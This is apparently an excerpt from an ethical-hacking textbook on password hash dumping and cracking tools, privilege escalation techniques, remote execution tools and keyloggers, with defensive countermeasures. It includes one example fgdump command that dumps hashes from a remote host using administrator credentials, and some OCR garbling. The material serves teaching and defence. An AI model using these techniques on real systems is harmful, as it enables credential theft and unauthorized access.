In cryptography, a "salt* consists of random data bits used as an input to a one-way function, the other being a password. Instead of passwords, the output of the one-way function can be stored and used to authenticate users. A salt combines with a password by a key derivation function to generate a key for use with a cipher or other cryptographic algorithm. This technique generates different hashes for the same password. This makes cracking the passwords difficult.
Tools to Extract the Password Hashes
Use the following tools to extract the password hashes from the target system:
■ pwdump7
Source: https://www.tarasco.org
pwdump7 is an application that dumps the password hashes (One Way Functions or OWFs) from NT's SAM database, pwdump extracts LM and NTLM password hashes of local user accounts from the Security Account Manager (SAM) database. This application or tool runs by extracting the binary SAM and SYSTEM File from the file system, and then extracts the hashes. One of the powerful features of pwdump7 is that it is also capable of dumping protected files. Pwdump7 is also able to extract passwords offline by selecting the target files. Use of this program requires administrative privileges on the remote system.
■ fgdump
Source: http://foofus.net
Fgdump is a utility for dumping passwords on Windows NT/2000/XP/2003/Vista machines. It comes with built-in functionality that has all the capabilities of PWdump and can do a number of other crucial things such as execute a remote executable and dump the protected storage to a remote or local host, as well as grab cached credentials.
Example:fgdump.exe -h 192.168.0.10 -u AnAdministrativeUser -p l4mep4ssw0rd Note: Use of above tools requires administrative privileges on the remote system.
Password Cracking Tools: LOphtCrack and ophcrack
Password cracking tools allow you to reset unknown or lost Windows local administrator, domain administrator, and other user account passwords. In the case of forgotten passwords, it even allows users to get access to their locked computer instantly without reinstalling Windows. Attackers can use the password cracking tools to crack the passwords of the target system. Listed below are a few password cracking tools.
■ LOphtCrack
Source: http://www.IOphtcrack.com
LOphtCrack is a tool designed to audit password and recover applications. It recovers lost Microsoft Windows passwords with the help of dictionary, hybrid, rainbow table, and brute-force attacks, and it also checks the strength of the password. LOphtCrack helps to disclose the security defects that are inherent in windows password authentication system.
Some of its important features include scheduling, hash extraction from 64-bit Windows versions, multiprocessor algorithms, and networks monitoring and decoding.
Features:
o Operates on networks with Windows systems, including 32- and 64-bit environments, as well as most BSD and Linux variants with an SSH daemon
o Performs scheduled scans depending on the organization's auditing requirements o Offers remediation assistance to system administrators on how to take action
against accounts that have poor passwords on Windows systems o Provides better user interface with more information about each user account, including password age, lock-out status, and whether the account is disabled, expired, or never expires
o Displays real-time reports in a separate, tabbed interface and displays auditing results based on the auditing method, risk severity, and password character sets
o Displays password risk status in four different categories: Empty, High Risk, Medium Risk, and Low Risk
o Reports the completion of the various password character sets being audited, including, Alpha, Alphanumeric, Alphanumeriq/Symbol, Alphanumeric/Symbol/lnternational
o Reports the overall length of the discovered password by account
o Delivers summary report of password statistics such as Locked, Disabled, Expired, or if the password is older than 180 days
o Delivers audit summary for the number of Accounts cracked and the number of Domains audited
o Cracks foreign passwords using foreign character sets for brute-force attacks, as well as foreign dictionary files
■ ophcrack
Source: http://ophcrack.sourceforge.net
ophcrack is a Windows password cracking tool that uses rainbow tables for cracking passwords. It comes with a graphical user interface and runs on different operating systems such as Windows, Linux/Unix, etc.
Features:
o Cracks LM and NTLM hashes
o Brute-force module for simple passwords o Real-time graphs to analyze the passwords
o Dumps and loads hashes from encrypted SAM recovered from a Windows partition
Password Cracking Tools
■ RainbowCrack
Source: http://project-rainbowcrack.com
RainbowCrack cracks hashes with rainbow tables, using a time-memory tradeoff algorithm. A traditional brute-force cracker cracks hashes differently than a time memory-tradeoff hash cracker. The brute-force hash cracker will try all possible plaintexts one by one during cracking, whereas RainbowCrack pre-computes all possible plaintext hash pairs in the selected hash algorithm, charset, and plaintext length in advance and stores them in the "rainbow table" file. It may take a long time to pre compute the tables, but once the pre-computation is finished, you will be able to crack the cipher text in the rainbow tables easily and quickly.
Features:
o Runs on Windows and Linux operating systems
o Provides full time-memory tradeoff tool suites including rainbow table generation, sort, conversion, and lookup
o Offers Unified rainbow table file format on all supported operating systems o Includes command-line user interface and Graphical user interface
o Supports computation on multi-core processor o Supports rainbow table
• For LM, NTLM, MD5 and SHA1 hash algorithms
• In raw file format (.rt) and compact file format (.rtc) of any charset
Some of the password cracking tools are listed below:
■ Cain & Abel (http://www.oxid.it)
■ Windows Password Recovery Tool (https://www.windowspasswordsrecovery.com)
■ Windows Password Key (https://www.lostwindowspassword.com)
■ hashcat (https://hashcat.net)
■ Passware Kit Forensic (https://www.passware.com)
■ John the Ripper (http://www.openwall.com)
■ THC-Hydra (https://github.com)
■ InsidePro (http://www.insidepro.com)
■ HashKiller.co.uk (https://hashkiller.co.uk)
■ LSASecretsView (http://www.nirsoft.net)
■ Password Cracker (http://www.amlpages.com)
■ Windows Password Recovery (https://www.passcape.com)
■ Password Recovery Bundle (https://www.top-password.com)
■ JRecoverer Database Bund\e(http://www.lcpsoft.com)
■ Hash Suite (http://hashsuite.openwall.net)
■ Medusa (http://foofus.net)
■ Password Unlocker Bundle (https://www.passwordunlocker.com)
■ Offline NT Password & Registry Editor (https://pogostick.net)
■ Proactive System Password Recovery (https://www.elcomsoft.com)
■ krbpwguess (http://www.cqure.net)
How to Defend against Password Cracking?
Best practices to protect against password cracking include:
■ Enable information security audit to monitor and track password attacks ■ Do not use the same password during password change
■ Do not share passwords
■ Do not use passwords that can be found in a dictionary
■ Do not use cleartext protocols and protocols with weak encryption ■ Set the password change policy to 30 days
■ Avoid storing passwords in an unsecured location ■ Do not use any system's default passwords
■ Make passwords hard to guess by using 8 to 12 alphanumeric characters, using a combination of uppercase and lowercase letters, numbers, and symbols. Strong passwords are hard to guess. The more complex the password, the less it is subject to attacks.
■ Ensure that applications neither store passwords to memory nor write them to disk in clear text. Passwords are always vulnerable to theft if they are stored in memory. Once the password becomes known, it is very easy for attackers to escalate their rights in the application.
■ Use a random string (salt) as a password prefix or suffix before encrypting. It nullifies pre-computation and memorization. Because salt is usually different for each individual, it is impractical for attackers to construct tables with a single encrypted version of each candidate password. UNIX systems usually use a 12-bit set.
■ Enable SYSKEY with a strong password to encrypt and protect the SAM database. Usually, the password information of user accounts is stored in the SAM database. It is very easy for password-cracking software to target the SAM database for accessing passwords. SYSKEY protects password information stored in the SAM data against password-cracking software through strong encryption techniques. It is more difficult to crack encrypted passwords than unencrypted ones.
■ Never use personal information (e.g., birth date, or a spouse's, child's, or pet's name) to create passwords. Otherwise, it becomes quite easy for those close to you to crack those passwords.
■ Monitor the server's logs for brute-force attacks on user accounts. Though brute-force attacks are difficult to stop, they are easily detectable by monitoring the web server log. For each unsuccessful login attempt, an HTTP 401 status code is recorded in the web server logs.
■ Lock out an account that has been subjected to too many incorrect password guesses. This provides protection against brute-force and guessing attacks.
■ Many password sniffers can be successful if LAN manager and NTLM authentication are used. Disable LAN manager and NTLM authentication protocols only after making sure that it does not affect the network.
■ Perform a periodic audit of passwords in the organization.
■ Check any suspicious application that stores passwords in memory or writes them to disk.
■ Unpatched systems can reset passwords during buffer overflow or Denial of Service attacks. Make sure to update the system.
■ Examine whether the account is in use, deleted or disabled. Disable the user account if multiple failed login attempts are detected.
■ Enable account lockout with a certain number of attempts, counter time, and lockout duration.
■ One of the most effective ways to manage passwords in organizations is to set an automated password reset.
■ Make the system BIOS password-protected, particularly on devices that are susceptible to physical threats, such as servers and laptops.
How to Defend against LLMNR/NBT-NS Poisoning
The easiest way to prevent a system from being attacked by a perpetrator is to disable both the LMNR and NBT-NS services in the Windows operating system. Attackers make use of these services in order to obtain user credentials and gain unauthorized access to the user's system.
Steps to disable LLMNR/NBT-NS in any version of Windows:
- Disabling LMBNR
o Open Local Group Policy Editor.
o Navigate to Local Computer Policy Computer Configuration -> Administrative Templates -> Network ->DNS Client.
o In DNS Client, double-click Turn off multicast name resolution. o Select the Disabled radio button and then click OK.
- Disabling NBT-NS
o Open Control Panel and navigate to Network and Internet -> Network and Sharing Center and click on Change adapter settings option present on the right side,
o Right-click on the network adapter and click Properties, select TCP/IPv4 and then click Properties.
o Under General tab, go to Advanced WINS.
o From the NetBIOS options, check "Disable NetBIOS over TCP/IP" radio button and click OK.
Escalating Privileges
Escalating privileges is the second stage of system hacking. Attackers use passwords obtained in
the first step to gain access to the target system and then try to attain higher-level privileges in
the system. The following topics explain various tool and techniques attackers use to escalate
their privileges.
Privilege Escalation
Privileges are a security role assigned to users for using specific programs, features, operating systems, functions, files or codes, and so on, to limit their access by different types of users. If a user is assigned more privileges, he/she can modify or interact with a restricted part of the system or application than can less privileged users. Attackers first gain system access with less privilege, and then try to gain more privileges to perform activities restricted to less privileged users. Privilege escalation attack is the process of gaining more privileges than were initially acquired.
In a privilege escalation attack, attackers first gain access to the network using a non-admin user account, and then try to gain administrative privileges. Attackers take advantage of design flaws, programming errors, bugs, and configuration oversights in the OS and software application to gain administrative access to the network and its associated applications.
Once an attacker has gained access to a remote system with a valid username and password, he/she will attempt to escalate the user account to one with increased privileges, such as that of an administrator, to perform restricted operations. These privileges allow the attacker to view critical/sensitive information, delete files, or install malicious programs such as viruses, Trojans, worms, etc.
Types of Privilege Escalation
Privilege escalation is required when you want to access system resources that you are not authorized to access. Privilege escalation takes place in two forms. They are vertical privilege escalation and horizontal privilege escalation.
■ Horizontal Privilege Escalation: In a horizontal privilege escalation, the unauthorized user tries to access the resources, functions, and other privileges that belong to the authorized user who has similar access permissions. For instance, online banking user A can easily access user B's bank account.
■ Vertical Privilege Escalation: In a vertical privilege escalation, the unauthorized user tries to gain access to the resources and functions of the user with higher privileges, such as application or site administrators. For example, someone performing online banking can access the site using administrative functions.
Privilege Escalation Using DLL Hijacking
Most Windows applications do not use the fully qualified path when loading an external DLL library; instead, they first search the directory from which they have been loaded. Taking this as an advantage, if attackers can place a malicious DLL in the application directory, the application will execute the malicious DLL in place of the real DLL. For example, if an application program ".exe" needs library.dll (usually in the Windows system directory) to install the application, and fails to specify the library.dll path, Windows will search for the DLL in the directory from which the application was launched. If an attacker has already placed the DLL in the same directory as program.exe, then that malicious DLL will load instead of the real DLL, which allows the attacker to gain remote access to the target system.
Privilege Escalation by Exploiting Vulnerabilities
A vulnerability is an existence of a weakness, design, or implementation error that can lead to an unexpected event compromising the security of the system. An attacker takes advantage of these vulnerabilities to perform various attacks on confidentiality, availability, or integrity of a system. The software designing flaws and programming errors lead to security vulnerabilities. Attackers exploit these software vulnerabilities such as programming flaws in a program, service or within the operating system software or kernel to execute malicious code. Exploiting software vulnerabilities allows attackers to execute a command or binary on a target machine to gain higher privileges than the existing ones or bypass security mechanisms. Attackers using these exploits can even access privileged user accounts and credentials.
Many public vulnerability repositories are available online that allow access to information about various software vulnerabilities. Attackers search for an exploit based on the OS and software application on exploit sites such as SecurityFocus (http://www.securityfocus.com), Exploit Database (https://www.exploit-db.com)and use that exploit to gain higher privileges.
Privilege Escalation using Spectre and Meltdown Vulnerabilities
Spectre and Meltdown are the recent CPU vulnerabilities found in the design of the modern processors including chips from AMD, ARM, and Intel. The performance optimizations in the modern processors led to these vulnerabilities. Attackers may take advantage of these vulnerabilities to gain unauthorized access and steal critical system information such as login credentials, secret keys, etc. stored in the application's memory to escalate privileges. These attacks can be performed because the normal verification of the user's privileges is disrupted through the interaction of features like branch prediction, out of order execution, caching, and speculative execution. Using these vulnerabilities attackers can exploit various IT resources such as most of the operating systems, servers, PCs, cloud systems, and mobile devices.
■ Spectre Vulnerability
Spectre vulnerability is found in many modern processors such as Apple, AMD, ARM, Intel, Samsung and Qualcomm processors. This vulnerability leads to tricking a processor to exploit speculative execution to read restricted data. The modern processors implement speculative execution to predict the future to complete the execution faster. For example, if the chip identifies that a program includes multiple conditional statements, it will start executing and concluding all the possible outputs before the program does. Attackers may exploit this vulnerability in different ways:
o The processor is forced to accomplish a speculative execution of a read before bounds checking is performed. As a result, an attacker can access and read out of bound memory locations.
o When executing conditional statements, for faster processing the processors use branch prediction to pick a path to speculatively execute. Attackers may exploit this feature to force processor to take an improper speculative decision and further access data out of range.
Attackers may use this vulnerability to read adjacent memory locations of a process and access information for which he/she is not authorized. This vulnerability helps attackers to extract confidential information such as credentials stored in the browser, from that target process. In certain cases, using this vulnerability an attacker can even read the kernel memory or perform a web based attack using JavaScript.
■ Meltdown Vulnerability
Meltdown vulnerability is found in all the Intel processors and ARM processors deployed by Apple. This vulnerability leads to tricking a process to access out of bounds memory by exploiting CPU optimization mechanisms such as speculative execution. For example, an attacker requests to access an illegal memory location. He/she sends a second request to conditionally read a valid memory location. In this case, the processor using speculative execution will complete evaluating the result for both requests before checking the first request. When the processor checks that the first request is invalid, it rejects both the requests after checking privileges. Even though the processor rejects both the requests, the result of both the requests remain in the cache memory. Now the attacker sends multiple valid requests to access out of bounds' memory locations.
Attackers may use this vulnerability to escalate privileges by forcing an unprivileged process to read other adjacent memory locations such as kernel memory and physical memory. This leads to revealing of critical system information such as credentials, private keys, etc.
Other Privilege Escalation Techniques
■ Access Token Manipulation
In Windows operating system, access tokens are used to determine the security context of a process or thread. These tokens include the access profile (identity and privileges) of a user associated with a process. After a user is authenticated, the system produces an access token. Every process the user executes makes use of this access token. The system verifies this access token when a process is accessing a secured object.
Any Windows user can modify these access tokens so that the process seems to belong to some other user than the user who started this process. Then the process acquires the security context of the new token. For example, Windows Administrators have to log on as a normal user and need to run their tools with admin privileges using token manipulation command "runas". Attackers can take advantage of this to access tokens of other users or generate spoofed tokens to escalate privileges and perform malicious activities by evading detection.
■ Application Shimming
The Windows operating systems uses Windows Application Compatibility Framework called Shim to provide compatibility between the older and newer versions of Windows. For example, Application shimming allows programs created for Windows XP compatible with Windows 10. Shims provide buffer between the program and the operating system. This buffer is referenced when a program is executed to verify whether the program requires access to the shim database. When a program needs to communicate with the operating system, the shim database uses API hooking to redirect the code. All the shims installed by default Windows installer (sbinst.exe) are stored at %WINDIR%\AppPatch\sysmain. sdb
hklm\software\microsoft\windows
nt\currentversion\appcompatf1ags\insta11edsdb
Shims run in user mode and they cannot modify the kernel. Some of these shims can be used to bypass UAC (RedirectEXE), inject malicious DLLs (InjectDLL), capture memory addresses (GetProcAddress) etc. An attacker can use these shims to perform different attacks such as disabling Windows defender, privilege escalation, installing backdoors, etc.
■ File System Permissions Weakness
Many processes in Windows operating system execute binaries automatically as part of their functionality or to perform certain actions. If the file system permissions of these binaries are not set properly then the target binary file may be replaced with a malicious file and it can be executed by the actual process. If the process that is executing this binary is having higher level permissions then the binary also executes under higher level permissions, which may include SYSTEM. Attackers can take advantage of this technique to replace original binaries with malicious binaries to escalate privileges. Attackers use this technique to manipulate Windows service binaries and self-extracting installers.
■ Path Interception
Path Interception is a method of placing an executable in a particular path in such a way that it will be executed by the application in place of the legitimate target. Attackers can take advantage of several flaws or misconfigurations to perform path interception like unquoted paths (service paths and shortcut paths), path environment variable.
misconfiguration, and search order hijacking. Path interception helps an attacker to maintain persistence on a system and escalate privileges.
■ Scheduled Task
The Windows operating system includes utilities such as 'at' and 'schtasks'. A user with administrator privileges can use these utilities in conjunction with the Task Scheduler to schedule programs or scripts that can be executed at a particular date and time. If a user provides proper authentication, he can also schedule a task from a remote system using RPC. An attacker can use this technique to execute malicious programs at system startup, maintain persistence, perform remote execution, escalate privileges, etc.
■ Launch Daemon
At the time of MacOS and OS X booting process, launchd is executed to complete the system initialization process. Parameters for each launch-on-demand system-level daemon found in /System/Library/LaunchDaemonsand /Library/LaunchDaemons are loaded using launchd. These daemons have property list files (plist) that are linked to executables that run at the time of booting. Attackers can create and install a new launch daemon, which can be configured to execute at boot-up time using launchd or launchctlto load plist into concerned directories. The weak configurations allow an attacker to alter the existing launch daemon's executable to maintain persistence or to escalate privileges.
■ Plist Modification
In MacOS and OS X plist (property list) files include all the necessary information that is needed to configure applications and services. These files describe when programs should execute, executable file path, program parameters, essential OS permissions, etc. The plist files are stored at specific locations like /Library/Preferences (which execute with high-level privileges) and ~/Library/Preferences (which execute with user privileges). Attackers can access and alter these plist files to execute malicious code on behalf of a legitimate user and further use them as a persistence mechanism and escalate privileges.
■ Setuid and Setgid
In Linux and MacOS, if an application uses setuid or setgid then the application will execute with the privileges of the owning user or group respectively. Generally, the applications run under the current user's privileges. There are certain circumstances where the programs must be executed with elevated privileges but the user running the program does not need the elevated privileges. In this scenario, one can set the setuid or setgid flags for their applications. An attacker can exploit the applications with the setuid or setgid flags to execute malicious code with elevated privileges.
- Web Shell
A Web shell is a web-based script that allows access to a web server. Web shells can be created in all the operating systems like Windows, Linux, MacOS and OS X. Attackers create web shells to inject malicious script on a web server to maintain persistent access and escalate privileges. Attackers use a web shell as a backdoor to gain access and control a remote server. Generally, a web shell runs under current user's privileges. Using a web shell an attacker can perform privilege escalation by exploiting local system vulnerabilities. After escalating the privileges, an attacker can install malicious software, change user permissions, add or remove users, steal credentials, read emails, etc.
How to Defend Against Privilege Escalation
The best countermeasure against privilege escalation is to ensure that users have the least possible or just enough privileges to use their system effectively. In this case, even though the attacker succeeds in gaining access to the low privileged account, he/she will not be able to gain administrative level access. Often, flaws in programming code allow such escalation of privileges on a target system. As stated earlier, it is possible for an attacker to gain access to the network using a non-administrative account, and then gain the higher privilege of an administrator.
The following are the best countermeasures to defend against privilege escalation:
■ Restrict the interactive logon privileges
■ Use encryption technique to protect sensitive data
■ Run users and applications on the least privileges
■ Reduce the amount of code that runs with particular privilege
■ Implement multi-factor authentication and authorization
■ Perform debugging using bounds checkers and stress tests
■ Run services as unprivileged accounts
■ Test operating system and application coding errors and bugs thoroughly
■ Implement a privilege separation methodology to limit the scope of programming errors and bugs
■ Patch and update the kernel regularly
■ Change UAC settings to "Always Notify", so that it increases the visibility of the user when UAC elevation is requested
■ Restrict users from writing files to the search paths for applications
■ Continuously monitor file system permissions using auditing tools
■ Reduce the privileges of user accounts and groups so that only legitimate administrators can make service changes
■ Use whitelisting tools to identify and block malicious software that changes file, directory, and service permissions
■ Use fully qualified paths in all the Windows applications
■ Ensure that all executables are placed in write-protected directories
■ In MAC operating systems, prevent plist files from being altered by users making them read-only
■ Block unwanted system utilities or software that may be used to schedule tasks
■ Patch and update the web servers regularly
■ Disable the default local administrator account
Executing Applications
Once attackers gain higher privileges on the target system by trying various privilege escalation attempts, they may attempt to execute a malicious application by exploiting a vulnerability to execute arbitrary code. By executing malicious applications, the attacker can steal personal information, gain unauthorized access to system resources, crack passwords, capture screenshots, install a backdoor for maintaining easy access, and so on.
Attackers execute malicious applications in this stage in a process called "owning" the system. Once they acquire administrative privileges, they will execute applications. Attackers may even try to do so remotely on the victim's machine to gather information that leads to exploitation or loss of privacy, gain unauthorized access to system resources, crack passwords, capture screenshots, install a backdoor to maintain easy access, and so on.
The malicious programs attackers execute on target systems can be:
■ Backdoors-Program designed to deny or disrupt operation, gather information that leads to exploitation or loss of privacy, gain unauthorized access to system resources.
■ Crackers- Piece of software or program designed for cracking a code or passwords.
■ Keyloggers- This can be hardware or a software type. In either case, the objective is to record each keystroke made on the computer keyboard.
■ Spyware- Spy software may capture the screenshots and send them to a specified location defined by the hacker. To this purpose, attackers have to maintain access to victims' computers. After deriving all the requisite information from the victim's computer, the attacker installs several backdoors to maintain easy access to it in the future.
Tools for Executing Applications
Tools used for executing application remotely helps attackers perform various malicious activities on target systems. After gaining administrative privileges, attackers use these tools to install, execute, delete, and/or modify the restricted resources on the victim machine.
■ RemoteExec
Source:/? ttps ://ww w.isdecisions.com
RemoteExec remotely installs applications, executes prog ram s/scri pts, and updates files and folders on Windows systems throughout the network. It allows an attacker to modify the registry, change local admin passwords, disable local accounts, and copy/ update/delete files and folders.
RemoteExec can perform the following activities remotely.
o Remote MSI package Installation: RemoteExec can remotely deploy applications developed using .msi format to a number of Windows systems by specifying the path of .msi file that the attacker wants to deploy, and then choosing the action (install/uninstall/repair/update) to perform.
o Remote Execution: RemoteExec allows remote execution of programs (.exe, .bat, ,cmd), scripts (.vbs, .js) and files associated to executables (.txt, .doc, .wav, .reg, .inf, .msi, etc.).
o Registry Modification: RemoteExec allows the remote modification of the registry on all Windows systems throughout the network, or of a specific subset of computers. You just have to indicate the path to the .reg, select the target systems and launch with a click.
o File Operations: RemoteExec allows copying, updating, or deleting files and folders on Windows systems throughout the network.
o Password and Local Account Management: RemoteExec allows remotely changing the Local Administrator Password and disabling all other local accounts to reinforce security.
o Interaction with Remote Systems: RemoteExec enables you to remotely power off, reboot or shutdown systems, wake up computers equipped with Wake-On-LAN technology, and lock or close user sessions.
Some of the privilege escalation tools are listed below:
■ PDQ. Deploy (https://www.pdq.com)
■ Dameware Remote Support (https://www.dameware.com)
■ ManageEngine Desktop Central (https://www.manageengine.com)
■ PsExec (https://docs.microsoft.com)
■ TheFatRat (https://github.com)
Keylogger
Keyloggers are software programs or hardware devices that record the keys struck on the computer keyboard (also called keystroke logging) of an individual computer user or a network of computers. You can view all the keystrokes of the victim's computer at any time in your system by installing this hardware device or programs. It records almost all the keystrokes on a keyboard of a user and saves the recorded information in a text file. As Keyloggers hide their processes and interface, the target is unaware of the keylogging. Offices and industries use keyloggers for monitoring the employees' computer activities and in home environments in which parents can monitor children's Internet activities.
A keylogger, when associated with spyware, helps to transmit your information to an unknown third party. Attackers use it illegally for malicious purposes such as for stealing sensitive and confidential information about victims. The sensitive information includes email IDs, passwords, banking details, chat room activity, IRC, instant messages, and bank and credit card numbers. The data, transmitted over the encrypted Internet connection, are also vulnerable to keylogging, because the keylogger tracks the keystrokes before encryption.
The keylogger program is installed onto the user's system invisibly through email attachments or through "drive-by" downloads when users visit certain websites. Physical keystroke loggers "sit" between keyboard hardware and the operating system, so that they can remain undetected and record every keystroke.
A keylogger can:
■ Record every keystroke typed on the user's keyboard
■ Capture screenshots at regular intervals, showing user activity such as typed characters or clicked mouse buttons
■ Track the activities of users by logging Window titles, names of launched applications, and other information
■ Monitor online activity of users by recording addresses of the websites visited and with keywords entered
■ Record all the login names, bank and credit card numbers, and passwords, including hidden passwords or data displayed in asterisks or blank spaces
■ Record online chat conversations
■ Make unauthorized copies of both outgoing and incoming email messages
Types of Keystroke Loggers
A keylogger is a hardware or software program that secretly records each keystroke on the user keyboard at any time. Keyloggers save captured keystrokes to a file for reading later or transmit them to a place where the attacker can access it. As these programs record all the keystrokes that are provided through a keyboard, they can capture passwords, credit card numbers, email address, names addresses, and phone numbers. Keyloggers have the ability to capture information before it is encrypted. This gives the attacker access to pass phrases and other "well-hidden" information.
There are two types of keystroke loggers: hardware key loggers and software key loggers. Both these keyloggers help attackers to record all keystrokes entered on the target system.
■ Hardware Keystroke Loggers
Hardware keyloggers are hardware devices look like normal USB drives. Attackers can connect these keyloggers between a keyboard plug and USB socket. All the keystrokes by the user are stored in the hardware unit. Attackers retrieve this hardware unit for accessing the keystrokes that are stored in it. The primary advantage of these loggers is that any antispy ware, antivirus, or desktop security program cannot detect them. Its disadvantage is easy discovery of its physical presence.
Hardware keystroke loggers are of three main types: ■ PC/BIOS Embedded
BIOS-level firmware that is responsible for managing keyboard actions can be modified in such a way that it captures the keystrokes that are typed. It requires Physical and/or admin-level access to the target computer.
■ Keylogger Keyboard
By attaching the hardware circuit with the keyboard cable connector, it captures the key strokes. It records the all the keyboard strokes to its own internal memory that can be accessed later. The main advantage of a hardware key logger over a software key logger is that it is not operating system dependent and hence, it will not interfere with any applications running on the target computer, and it is impossible to discover hardware keyloggers by using any anti-keylogger software.
■ External Keylogger
External keyloggers are attached between a usual PC keyboard and a computer. They record each keystroke. External keyloggers do not need any software and work with any PC. You can attach them to your target computer and can monitor the recorded information on your PC to look through the keystrokes. There are four types of external keyloggers:
• PS/2 and USB Keylogger: Completely transparent to computer operation and requires no software or drivers for the functionality. Record all the keystrokes typed by the user on the computer keyboard, and store data such as emails, chat records, applications used, IMs, and so on.
• Acoustic/CAM Keylogger: Acoustic keyloggers work on the principle of converting electromagnetic sound waves into data. It makes use of either a capturing receiver capable of converting the electromagnetic sounds into the keystroke data or a CAM (camera) capable of recording screenshots of the keyboard.
• Bluetooth Keylogger: Requires physical access to the target computer only once, at the time of installation. After installation on the target PC, it stores all the keystrokes and you can retrieve the keystroke information in real time by connecting via a Bluetooth device.
• Wi-Fi Keylogger: Besides standard PS/2 and USB keylogger functionality, it features remote access over the Internet. This wireless keylogger will connect to a local Wi-Fi Access Point, and send E-mails containing recorded keystroke data. You can also connect to the keylogger at any time over TCP/IP and view the captured log.
■ Software Keystroke Loggers
These loggers are the software installed remotely via a network or email attachment in a target system for recording all the keystrokes. Here, the logged information is stored as a log file on a computer hard drive. The logger sends keystroke logs to the attacker using email protocols. Software loggers often have the ability to obtain additional data as well, because they do not have the limitation of physical memory allocations, as do hardware keystroke loggers.
There are four types of software keystroke loggers:
■ Application Keylogger
An application keylogger allows you to observe everything the user types in his or her emails, chats, and other applications, including passwords. With this, you even can trace the records of Internet activity. It is an invisible keylogger to track and record everything happening within the entire network.
■ Kernel/Rootkit/Device Driver Keylogger
Attackers rarely use kernel keyloggers because it is difficult to write and requires a high level of proficiency from the keylogger developers. These keyloggers exist at the kernel level. Consequently, they are difficult to detect, especially for user-mode applications. This kind of keylogger acts as a keyboard device driver and thus gains access to all information typed on the keyboard.
The rootkit-based keylogger is a forged Windows device driver that records all keystrokes. This keylogger hides from the system and is undetectable, even with standard or dedicated tools.
This kind of keylogger usually acts as a device driver. The device driver keylogger replaces the existing I/O driver with the embedded keylogging functionality. This keylogger saves all the keystrokes performed on the computer into a hidden logon file, and then sends the file to the destination through the Internet.
■ Hypervisor-based Keylogger
A hypervisor-based keylogger works within a malware hypervisor operating on the operating system.
■ Form Grabbing Based Keylogger
Form-grabbing-based keylogger records the web form data and then submits it over the Internet, after bypassing https encryption. Form-grabbing-based keyloggers log web form inputs by recording web browsing on the Submit event function.
Hardware Keyloggers
Let us examine the details of external hardware keyloggers. As earlier discussed, there are various types of external hardware keyloggers available in the market. These keyloggers are plugged in-line, between a computer keyboard and a computer. These types of keyloggers include:
■ PS/2 key logger
■ USB keylogger
■ Wi-Fi keylogger
■ Keylogger embedded inside the keyboard
■ Bluetooth keylogger
■ Hardware keylogger
These key loggers monitor and capture the keystrokes of the target system. As these external keyloggers attach between a usual PC keyboard and a computer to record each keystroke, these external hardware key loggers will remain undetectable by the anti-keyloggers installed on the target system. However, user can easily detect their physical presence.
There are various hardware keylogger manufacturers and vendors, some of which are discussed below.
■ KeyGrabber
Source: https://www.keydemon.com
KeyGrabber hardware keylogger is an electronic device capable of capturing keystrokes from a PS/2 or USB keyboard. It provides various types of external hardware keyloggers such as KeyGrabber USB, KeyGrabber PS/2, and KeyGrabber Nano Wi-Fi.
Some of the hardware keyloggers are listed below:
■ KeyCarbon (http://www.keycarbon.com)
■ Key I lama Key logger (https://Keyllama.com)
■ Keyboard logger (https://www.detective-store.com)
■ KeyGhost (http://www.keyghost.com)
■ KeyCobra (http://www.keycobra.com)
■ KEYKatcher (https://keykatcher.com)
